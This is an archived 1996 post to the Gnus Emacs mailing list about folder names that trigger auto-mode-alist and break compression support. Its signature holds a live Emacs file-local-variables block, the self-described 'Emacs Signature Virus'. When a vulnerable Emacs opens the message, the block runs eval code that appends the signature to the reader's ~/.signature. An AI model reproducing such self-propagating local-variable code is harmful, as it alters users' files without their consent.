From mboxrd@z Thu Jan 1 00:00:00 1970 X-Msuck: nntp://news.gmane.io/gmane.emacs.gnus.general/5870 Path: main.gmane.org!not-for-mail From: Per Abrahamsen Newsgroups: gmane.emacs.gnus.general Subject: Re: couple of feature requests, a question Date: 08 Apr 1996 19:23:49 +0200 Sender: abraham@dina.kvl.dk Message-ID: References: NNTP-Posting-Host: coloc-standby.netfonds.no Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-Trace: main.gmane.org 1035146411 1640 80.91.224.250 (20 Oct 2002 20:40:11 GMT) X-Complaints-To: usenet@main.gmane.org NNTP-Posting-Date: Sun, 20 Oct 2002 20:40:11 +0000 (UTC) Return-Path: ding-request@ifi.uio.no Original-Received: from ifi.uio.no (ifi.uio.no [129.240.64.2]) by deanna.miranova.com (8.7.5/8.6.9) with SMTP id LAA03823 for ; Mon, 8 Apr 1996 11:14:43 -0700 Original-Received: from elc1.dina.kvl.dk (elc1.dina.kvl.dk [130.225.40.228]) by ifi.uio.no with ESMTP (8.6.11/ifi2.4) id for ; Mon, 8 Apr 1996 19:29:08 +0200 Original-Received: from babbage.dina.kvl.dk (babbage.dina.kvl.dk [130.225.40.217]) by elc1.dina.kvl.dk (8.6.12/8.6.4) with ESMTP id TAA24146; Mon, 8 Apr 1996 19:22:20 +0200 Original-Received: (abraham@localhost) by babbage.dina.kvl.dk (8.6.12/8.6.4) id TAA00362; Mon, 8 Apr 1996 19:23:49 +0200 Original-To: ding@ifi.uio.no X-Face: +kRV2]2q}lixHkE{U)mY#+6]{AH=yN~S9@IFiOa@X6?GM|8MBp/ In-Reply-To: wrobert2@mailhost.tcs.tulane.edu's message of 08 Apr 1996 11:30:54 -0500 Original-Lines: 32 X-Mailer: September Gnus v0.67/Emacs 19.30 Xref: main.gmane.org gmane.emacs.gnus.general:5870 X-Report-Spam: http://spam.gmane.org/gmane.emacs.gnus.general:5870 >>>>> "SSFR" == St Suika Fenderson Roberts writes: SSFR> Lars posted something about the 'raw s being in there to deal with the SSFR> fact that emacs dumps one into cc mode if the folder name ends in .cc . SSFR> unless some other MTA/MUA needs the folder to end in .cc it seems the SSFR> most reasonable fix is `don't end your folder names in .cc' rather SSFR> than breaking compression support. That is not just `.cc', it is anything in `auto-mode-alist'. Saying `don't use file names matching anything in `auto-mode-alist'' is nnoott reasonable. However, wrapping (let (auto-mode-alist) ) around the call might be if that is the only problem (you don't want file local variables to take effect either). -- Consider adding "(setq inhibit-local-variables t)" to your ".emacs" file. Local Variables: eval: (save-excursion (goto-char (point-max)) (search-backward (concat "Consider " "adding")) (append-to-file (point) (point-max) "~/.signature") (message "The Emacs Signature Virus")) End: [ This virus actually worked with RMAIL users in Emacs 18! MS-Word viruses, go home. ]